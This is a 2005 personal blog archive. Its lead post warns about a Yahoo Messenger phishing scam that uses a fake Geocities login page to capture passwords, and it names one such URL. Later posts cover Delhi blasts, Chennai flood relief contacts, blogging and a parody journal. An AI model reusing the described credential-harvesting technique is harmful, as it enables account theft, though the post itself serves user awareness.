Sunday, 30 October 2005

Yahoo password hack warning

Actually, make that:

Yahoo Messenger password scam warning



Note: I have kept the earlier, inaccurate, post title because this post gets a lot of traffic via search and has been linked to here and there, so I don't want to change the permalink. Though I hope the subhead in larger type makes things clearer.

It happens via Yahoo messenger.

You get a message, apparently from someone on your list. So far, I haven't been able to check if it's someone who's fallen for this, and whose account is being used, or a spoofed send.

The message is something along the lines of "see my new pictures." With a Geocities link. When you go to the link, even if you don't know that Geocities is a home page provider and that it was bought over by Yahoo many years ago, you see the reassuring "yahoo" in the URL, a Yahoo logo alongside the Geocities logo, and what looks like a Yahoo photos page that asks you to log in before you can proceed. All the links work, and go to genuine Geocities sign up, Terms and Conditions, Privacy Policies, etc. Except that you don't need a password to view a Geocities page. (Well, yes, you might, if the page owner has locked some pages behind a javascripty thingy or summat, but you won't need yo put in your Yahoo password.)

Proof? Just dump in any arbit name and password. It will seem to accept it (if you look quickly at your status bar, you'll see the page sending to another site).

Just a little while ago, I got what looked like a message from a pal. It didn't sound like him in the least, so my antennae were up. (Besides, a friend told me a few days ago she'd just got hit by a password-stealer, so I guess I was a little wary.)

Clicked the link, and it was as I described it above. Here it is: http://www.geocities.com/hot_pretty_belle/

And in case it's not up, here's a screen grab:



I did a little "view source" and here's what the form looks like underneath the hood. (I have the complete page saved, if one of you techwizards wants it. Just get in touch.)

*see update 2 below


(If the code in the image doesn't make sense to you, here's the skinny: when you hit "enter", the page sends your Yahoo ID and password to hot_pretty_belle, or whoever else has set up the page.)

Now that you know, want to have a little fun? Fill in username and password fields with language mama would have washed your mouth out with soap for. And hit enter. hot_pretty_belle (or whoever you next encounter trying this stunt) will get lots of piping hot email.

Be warned. You'll get another page offering you another sign in button. And a Sign Up button, which, on click, gives you a genuine-looking Yahoo sign up page. Just loook up at the URL. Too tired to go see that bit of source code now, so will leave it to you tech-adepts.

I'm going to wait a day before reporting this to Yahoo, so go send that hot_pretty_belle your love!

And do pass this on. No, you don't need to credit me. Well, if you insist. I'm a slut for link love.

Update 1

Did a bit of research, and found out what happen if you enter a genuine Yahoo ID and password and click through.

The page records your ID and password, then forwards you to the real Yahoo Photos site. You (: if you hadn't read this :) would have just muttered imprecations about the dorkiness of the pal who didn't give you proper links.

And a few minutes later, you would have got a message from Y!M saying "You have been signed off Yahoo because you signed in from another location."

This has been happening quite often, so it's not much point remembering specific URLs, like hot_pretty_belle. Just remember the method.

Update 2

Thanks to ViswaPrabha and Prashanth, who told the doofus - me - that even with angle brackets html-ised to show up on the page, the script would send comments on this post (and possibly blogger ID and password! shudder!) to the black hats who run the page I referred to. So, text removed and replaced with an image, and now it will behave like a normal, harmless blogger page.

I, for once, am glad that no one commented!

Many Thanks, VP and Prashanth.

Update 2 - 9th July 2006
Please see this diary entry at SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System and this entry on the McAfee Avert Labs Blog. The SANS page points out a development that didn't exist when I wrote this post:
The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this.
And the McAfee page points to this discussion on Broadband Reports, which also mentions the encrypted page.

Delhi Blasts - 2

Rediff says "the Union Health Ministry has set up a control room to ensure speedy treatment to those injured. The control room can be reached at 011-23061302."

Please don't swamp that number with calls unnecessarily.

And the Chief Minister advises people to stay away from the markets.

Delhi bomb explosions

At least three explosions in crowded market areas in Delhi are reported to have killed at least 21 people.

Blasts were reported in Paharganj, near New Delhi railway station, Sarojini Nagar and Govindpuri. And a bomb was found and defused at Chandni Chowk.

Here's the BBC, Rediff, Indian Express, Hindustan Times, Reuters, The Hindu, Times of India, Outlook, NDTV.
Update
The injured have been moved to Dr Ram Manohar Lohia Hospital, Baba Kharak Singh Marg, Near Gole Dakkhana, New Delhi-1. (ph: +91 11 23365525, 23361948) and Safdarjang Hospital, Aurobindo Marg, South Delhi (ph: +91 11 26165060, 2665032, 26168336, 26864865).

[From the Delhi Government's Hospitals in Delhi Page and Sify.

Alea jacta est. Nunc est bibendum

Remember all those Latin expressions in the Asterix comics? Mainly from the old peg-legged pirate as the ship went down? Did you understand them all? Didja? Huh? Didja? Honest? Sind Sie sicher? Eerlijk? Absolument? (Darn. The Babel Fish doesn't do Czech.)

We have a swollen head, we do.

So no one's written us an ode. No sonnets or songs about us, no portraits or statues in public places, no fan sites, no groupies.

But we're quite tickled about this.

Friday, 28 October 2005

And now for the audio-visual round

Pal and colleague, J Krishnamurthi (a.k.a. JK a.k.a. Jakes), quizzer, quizmaster, techie and atrocious pun perpetrator has succumbed to the siren song of the blogosphere and set up not one but two blogs.

In Quizerati, he and his pals from Quizness will discourse knowledgeably on:
A. Quizzes
B. Quizzers
C. Malika Sherawat
D. All of the Above.

And on Musings of the completely jobless, he will talk about (going by current evidence):
A. Mallika Sherawat
B. Mallika Sherawat
C. Mallika Sherawat
D. Mallika Sherawat

Right. Do you need a lifeline?

Chennai update

Please see Chennai Help, where suman kumar, Chenthil, Ravages, Echo and Kaps are putting together information on the heavy rain and floods the city has been experiencing. From what I saw on TV a little while ago, it could get worse. There's a cyclone approaching, and Ongole, to the north, in Andhra Pradesh, is right in its path.

Man, talk about a year for disasters!

Thursday, 27 October 2005

The Chennai floods

Via email from AID:

A team of volunteers from the AID Chennai office, headed by Damu, is already traveling (through some of the safer roads by four-wheeler) and assessing the damage in some of the slums in Chennai, inspite of the heavy rains outside!

Ph numbers to contact:
AID Chennai office: 044-28350403,
Damodharan: 94442 41918
Balaji Sampath: 94440 61033
Chandra: 93823 30752
Ravishankar: 94440 84910

Hi all,

Heavy rains have been lashing chennai+other areas in TN, neighboring states for the past few days. Balaji was in Nagai yesterday and has visited many of the affected coastal areas on the way back to Chennai.
There are different categories of affected people:

(i) People facing difficulty in getting to work, accessing amenities, people who might lose their business, or worse their entire crop
(ii) Water entering people's houses and their having to evacuate to friends' houses
(iii) People living in thatched houses losing their homes and possessions

As of now, AID-TN is trying to work with the third category of people - they are among the poorest and most in need of help. The chennai corporation has arranged for some of them to be shifted to nearby schools. In other areas of TN too, a lot of work is required in this regard. We are planning to concentrate out work in the following areas where we are working already (both coastal and otherwise):
Vembakkam (Tiruvannamalai district)
Sulagiri (krishnagiri)
Bhuvanagiri (Cuddalore)
Koovathur (tsunami affected cluster, Kanchipuram) and
Chennai.

Most of us are staying home and co-ordinating over the phone. A team of volunteers from the AID Chennai office, headed by Damu, is already traveling (through some of the safer roads by four-wheeler) and assessing the damage in some of the slums in Chennai, inspite of the heavy rains outside! We plan to focus on the following:
(i) Immediate housing needs
(ii) Basic relief - food and water
(ii) Clothing requirements -
- Sweaters, jackets, blankets, bedsheets
- Children's clothes, both boys and girls
- Sarees, since they can be used for multiple purposes in such
situations (for ex: as screens for women in make-shift camps)

We request people to drop off sweaters, blankets and bedsheets and ONLY THE ABOVE CATEGORY OF CLOTHES at the AID office, when possible. We will also be collecting donations for providing relief supplies and housing assistance.

We will keep you updated.

Ph numbers to contact:
AID Chennai office: 044-28350403,
Damodharan: 94442 41918
Balaji Sampath: 94440 61033
Chandra: 93823 30752
Ravishankar: 94440 84910

Thanks.
-Ravishankar

More on IIPM v/s the blogs

In India, you might think that if you buy enough newspaper ads, those same newspapers won't bother to check the claims you make in those ads. The papers wouldn't want to lose ad money, right? But that old equation is changing, thanks to one scrappy youth magazine called JAM and the collective investigative strength of the Indian blogosphere.
Read the rest of Mark Glaser's piece on the IIPM's tiff with the blog world here, on Online Journalism Review. Glaser also wrote about the mediaah! affair in March, and OJR's Shefali Srinivas reported the Citizen Journalist response to the December earthquake and tsunami.

back to the future

Have you noticed this?

All the young 'uns carry haversacks these days.

And all of them wear the straps extended to their maximum, so that the bag hangs really low, butt level or thereabouts.

(Decidedly unergonomic, and also bad for their backs, except bags are never packed full - about three slim books and pencil box or whatever it is they carry in them seems to be the load.)

So is this Generation Zed's version of this blog's contemporaries' expression of our individuality: every one of us wearing our caps backwards, never mind about the sun in our eyes?

Sir Harold and Sir Arthur on Citizen Journalism and Blogging

A couple of extracts from Outlook's Tenth Anniversary Issue
Do you think the rise of ‘Citizen Journalism’, with blogging being one element of it, represents a diminishing trust in the established media? How can news organisations go about building credibility in the eyes of readers, viewers and listeners?

Established media has lost some trust, no doubt, but I think the rise of blogging is more to do with the appetite for telling the world where to get off. Very healthy. Most of it is opinion/argument, which is fine, but there is no central organising intelligence to sustain the heart of journalism which is reporting. (And sometimes that reporting is too difficult, too urgent, to leave to one reporter). Indeed, a significant proportion of cyberspace perpetuates myth and falsehood. The absurd lie that Jews blew up the World Trade Center on 9/11 began life on the web and got endlessly recycled by the credulous, the ignorant and the malevolent. One of the tasks I would submit to mainstream media is the regular detection and exposure of cyber propaganda.
From an interview with Sir Harold Evans, Former Editor, the Sunday Times, London, Former Editor-in-Chief, Atlantic Monthly Press, President and Publisher, Random House, Author, of Good Times, Bad Times, voted the Editor of the Century in 2002.
Blogs, wikis and citizen journalism are all signs of things to come.

This has far-reaching implications. For one thing, it allows far higher levels of interactivity and audience engagement than has been possible in newspapers, radio or television. Even more importantly, the web provides a platform for small-time companies, organisations and single individuals to disseminate ideas, analyses and viewpoints to a potentially global audience. And it can be done at a fraction of the cost of launching mainstream media outlets. While the web is not yet a level playing field and has its own limitations, it has already triggered the end of absolute power enjoyed by press barons and gatekeeper editors.

Nowhere is this breach more apparent than in the remarkably swift rise of bloggers. Their publishing of online diaries has shown how passionate individuals can command attention and influence way beyond their professional or social circles. John Naughton, a noted British chronicler of the new media, says the web has again demonstrated its capacity to unleash disruptive innovation on a complacent establishment. As he wrote in 2003, "The response of the ‘professional’ media to this explosion has been interesting. First there was patronising incredulity that people would write without being paid for it. Then there was disdain. ‘Where’, asked the hacks, ‘was the quality control?’ Surely the whole thing was just an epidemic of vanity publishing. Then there was unease, fuelled by the realisation that (a) large numbers of bloggers were talking to one another behind the media’s back, as it were, and (b) some of them knew more about many subjects than most journalists. Badly researched or ideologically skewed reporting was being instantly skewered by bloggers...."

Naughton has documented many instances where poor journalism about highly technical or complicated issues was exposed by bloggers. The Columbia space shuttle disaster was one, where half-baked journalistic theories were effortlessly demolished by bloggers with serious aerospace expertise.

The blogging community has refused to accept the news ‘agenda’ as determined by the mainstream media. As Naughton says, "This has been increasingly evident since 9/11 as the established US media have dumbed down their discussion of the issues surrounding security, civil liberties and Bush’s policy towards Iraq.It would not be much of an exaggeration to say that (with a few honourable exceptions) most of the serious discussion of these issues in the US at the moment is happening in weblogs and not in the ‘official’ mass media."

It’s too soon to tell how much and how far bloggers could act as a countervailing force for the lapses and excesses in the mainstream media not just in the US, but across the world. We can only hope that the bloggers will push the mainstream to embrace long overdue reforms to become more transparent and accountable—the very virtues that editorialists constantly preach to the world’s governments and corporations.
From Arise, Citizen Journalist!, by Sir Arthur C Clarke, SciFi legend, the man who predicted geostationary satellites in one of his stories, and inspired Tim Berners-Lee to invent the World Wide Web with another.
[Cross-posted at indi³.]

Wednesday, 26 October 2005

Blog Quake Day



We did it in the IIPM scrap.

Before that, the blog world truly came of age (IMAO), to support the TsunamiHelp effort.

Now, it's time to band together for Blog Quake Day.

Do a post. Link to a charity or NGO you support (you can find many on Quake Help. Encourage your readers to make a donation. Give some yourself.

DesiPundit, who issued the call, has a link roundup posted here.

Tuesday, 25 October 2005

Best of Blogs

At the 2005 BOBs, the South-East Asia Earthquake And Tsunami blog has nominations in the categories Best Journalistic Blog - English, and Best Weblog.

Go here (and send your friends too) to vote: http://www.thebobs.com/thebobs05/bob.php?site=vote

And here to see the current status: http://www.thebobs.com/thebobs05/bob.php?site=nominate_result

Voting closes 20th November.

Competition for Google Earth?

We were doing a little research for a column and stumbled on NASA's open source World Wind and MSN's Virtual Earth. Must do a comparison this week.

Ooh, the irony.

From the Outlook story on IIPM: "Dan Rather, the blogger..."

Heh.

Saturday, 22 October 2005

Doggerel for Caferati, and everyone else who craves feedback

A word of explanation. On Caferati's Ryze message board, there's often much wailing and beating of breasts about lack of feedback on deathless prose and immortal verse. And that plaintive cry frequently echoes down the corridors of the blogosphere too. Sure, I've felt too - in both arenas - that I could use a lot more feedback than I get. But if there's one thing blogging has taught me is that you better do it because you like it, not because it's an instant ticket to an interactive audience.

This might just as well have been called "Blogging Blues." :)


Doggerel for Caferati

You can sing the blues,
You can pay your dues,
You can try, and still lose,
There's no "money back."

Yeah.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

You can be bold, shy,
You can despair, cry,
You can ask God why.
But you can't do jack.

Sad.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

You can do it all right,
You can fight the good fight,
You can spend lonely nights
Put your head on the tracks.

But.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

Gotta tell you this, baby:
You gotta do it for free,
There are no guarantees
For love and feedback.

No.

You can't expect it,
You can't demand it,
You can deserve it,
And still not get it.

We'll settle for brain dead, though

Apparently USA presidents starting their terms in years ending with zero are kinda jinxed. Ronnie survived. Sigh.

[insert obligatory "suitable something" pun here]

Sonia was at the Two Lives reading in Bombay, and has a hilarious post up here. [Now we have to cadge an invitation to her beer-and-olives party.]

And The Duck was at the Delhi soirée, where more fun was had by all. [Aside: we have only met the quacker and the Jabberwock at Hurree Babu's durbar, where the lads behave most decorously. Clearly one must accompany them to book launches instead.]

Sniff. No one invites us to these things either. Ah well.

Friday, 21 October 2005

Right to Blog for Awareness Petition

We haven't written about the whole IIPM thing, but so many others have, eloquently, and to far, far, far, far, far larger audiences than frequent this blog. P'raps we'll post at some length on this later, or at least post you some links, but in the meanwhile, we urge you to go read, and if you agree, sign the Right to Blog for Awareness Petition.

Thank You.

p.s. We just discovered that there's already another, somewhat more strident petition up, which you can read and sign here.

Ahem

This just arrived via snail mail. We had heard about it via email ages ago, of course, and yes, we know that we shouldn't be so pleased with a piece of paper recognising a digital effort in a digital age, but nevertheless....

Prixars 2005 Honorary Mention
prixars2005web
Originally uploaded by zigzackly.

Wednesday, 19 October 2005

Oh that Georgie

The things he gets himself into. (And refresh the page for more variations. Hours of good clean fun.) [Thanks Anjana.]

Tuesday, 18 October 2005

So who are one's real friends then?

Give us a free ticket to this and prove it, okay?

Thursday, 13 October 2005

My Live Journal

Today was really tiring.

I got out of bed really late because my alarm clock has broken and I cannot afford a new one at the moment.

I feel sad, because Sarah and Britney are complete bitches. They told everyone I have an STD, just because I slept with both of their boyfriends on Saturday night.

I'm so hardcore. Me and Buzz went to the mall today, and I stole a whole heap of stuff. I got a Good Charlotte CD, a couple of DVDs and some new boots. Buzz got caught, but he fought his way out, and then we stole some lady's car and smashed it into a phone booth.

Last night I had to go and pay Joshua's bail. He's such a jerk. He got arrested for punching the Walmart clerk in the face for refusing to sell him beer. He's only 16!

I want to tell the world that my girlfriend Amy is the bomb! She made pizza last night, and even though I burnt my lips on the cheese, it was awesome!!!

I am really annoyed with those assholes at _are_you_hotter_than_us_?, because I am so much cuter than them, and those photos don't do me justice. They can't reject me, so I'm starting my own rating community. Click here to join (the first five applicants are automatically accepted).

Today, I got a digital camera! Yes! Here's some photos of my girlfriend in the nude (but don't tell her that I've posted them here - she'll kill me! Har har.)

I want to say thanks to my dad for giving me my own computer and digital camera. Here's a photo of my room. The weather in Ontario is cold. I have nothing more to say.

I went to the doctor yesterday, and he said I have bipolar disorder, which makes me different enough to be interesting, but the same as all the other cool people with bipolar disorder.

You should all do this quiz! It's amazingly accurate. You just put in your name and birthday, and it will tell you what your favourite sexual position is.

Yawn.

That's enough for now. But I'll leave you with this poem I wrote. It's about my friend Robert, who has bipolar disorder. Just like me. And Heidi.

Created with the Gregor's Semi-Automatic LiveJournal Updater™. Update your journal today!
Powered by Rum and Monkey

Monday, 10 October 2005

WorldWideHelp

The idea is that any time there's a disaster, any member of the group can alert the a ready-made team, all of them with experience in the field, enthusiasm and goodwill, and request help to get something going.

Once the actual project takes shape, the individuals involved may decide to form a separate coordination group to run things.

The other part of the agenda is that we can exchange info, learn from the things we did wrong, and get better each time the sad, but inevitable happens.

I'd love to send you all individual invitations, but aside from the time it would take, it would also mean that your invitations would go into automatic human review by googlegroups, and that can take ages. It's much quicker to tell you about it!

Group Page:
http://groups.google.com/group/WorldWideHelp
Group description:
General newsgroup and rallying point for power bloggers, wiki experts, database adepts, etc, for calls to action and volunteers to provide information post-disasters.
Will also be used to exchange information in more peaceful times, so we can all learn from our experiences.

Join This Group question:
Please tell us which online relief efforts you have participated in, and your strengths (eg. blogging, wikis, databases, tech innovation, hosting, sponsorship, etc).

Go here to send in a join request.

Sunday, 9 October 2005

South Asia Quake

The SEA-EAT team has started South Asia Quake Help to get out news and information about resources, aid, donations and volunteer efforts after the Earthquake of October 8th, 2005.

Please visit, link to and mail your friends about it. The URL: http://quakehelp.blogspot.com/

Friday, 7 October 2005

This one's for me

Also via Karmayog:
NAMI walk for Mentally Ill - NCPA to Oxford Bookstore

Oxford Bookstore in association with NAMI India and Karmayog.com invite you to celebrate

World Mental Health Day

Walk from NCPA to Oxford Bookstore

ANJALI CHABARIA will be present to conduct an interactive session on the theme

9th October 2005 Sunday
9:30 a.m.- The walk begins
10.30 a.m. – Join us for the talk at Oxford Bookstore

Oxford Bookstore
Apeejay House
3, Dinsha Vachha Road
Churchgate, Mumbai 20
RSVP: John at 98201-55591

~Program Sponsors~
Sun Pharma
NAMI INDIA

Sue 'em

Via a Karmayog newsletter:
MUMBAI ROADS OR CRATERS ON THE MOON

The condition of Mumbai roads is pitiable and the authorities responsible for maintaining good roads i.e. BMC, PWD, MMRDA, MHADA, Dairy Development Dept., Mumbai Port Trust & Ors. have failed to provide good roads, despite spending crores of rupees of tax-payers' monies. Citizen is a helpless victim of the bad roads and the infants, elderly, infirm and pregnant ladies continue to bear the brunt of bad roads.

I am pursuing a Suo Motu Writ Petition no. 3 of 2005 in the High Court at Mumbai before the Hon'ble Chief Justice.

During the last hearing on 26th Sept., BMC's Counsel Mr. K. K. Singhvi contended that except few roads, which are damaged by unprecedented rains this year, everything else is fine !

Mr. Singhvi also contended that the reports in the Media are all exaggerated! Of course, when I contended that are the photographs also exaggerated, Mr. Singhvi had no answer !

BMC & other authorities responsible for the roads have the tax-payers monies at their disposal to engage Senior Counsel/s while I am doing this at my own costs, time & efforts; an unequal fight.

Court has now directed us to submit specific examples of bad roads i.e. name & address of portion of the road which is bad, the nature of defect i.e. sunken/cracked/pot holes or any other defects, etc.

We therefore seek cooperation of the Citizens of Greater Mumbai to inform us, details of such roads with exact location & nature of defect, either on email or by letter, at the following address:

Kewal Semlani,
Postbox 11688, Nariman Point, Mumbai 400021
E-mail: mumbairoads@mahadhikar.org

This PIL is for your good and if you do not act now, you will continue to suffer from bad roads, year after year. Naturally, this will also result in the tax-payers hard earned monies being wasted.

WAKE-UP NOW OR KEEP ON SUFFERING !

Kewal Semlani

Wednesday, 5 October 2005

Not on the furniture

Go here, pick an item, choose from the five ready to, er, go options, or make up your own, with the, ahem, arrangements that suit you best. [Not while the kids are around, okay?]

Saturday, 1 October 2005

And they call me potty-mouthed

Really now, fellas, would be able to let it all hang out in front of one of these?